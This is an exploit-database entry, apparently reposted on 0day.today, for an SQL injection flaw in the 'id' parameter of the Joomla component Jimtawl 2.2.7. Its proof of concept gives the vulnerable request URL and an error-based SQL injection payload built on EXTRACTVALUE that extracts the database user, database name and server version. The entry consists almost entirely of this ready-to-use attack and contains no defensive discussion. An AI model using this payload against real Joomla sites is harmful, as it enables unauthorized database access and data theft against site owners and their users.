id: 31245
date: 10/03/2018
title: Joomla Jimtawl 2.2.7 Component - id SQL Injection Vulnerability
author: Ihsan Sencan
cves: 

# Exploit Title: Joomla! Component Jimtawl 2.2.7 - 'id' SQL Injection
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://janguo.de/
# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/thematic-directory/collection-factory/
# Software Download: https://vd.janguo.de/attachments/download/191/pkg_jimtawl-2.2.8-current-r569.zip
# Version: 2.2.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: NA
 
# POC: 
# 1)
# http://localhost/[PATH]/index.php?option=com_jimtawl&view=user&task=user.edit&id=[SQL]
 
' AND EXTRACTVALUE(66,CONCAT(0x5c,(SELECT (ELT(66=66,1))),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())))-- VerAyari

#  0day.today [2023-03-27]  #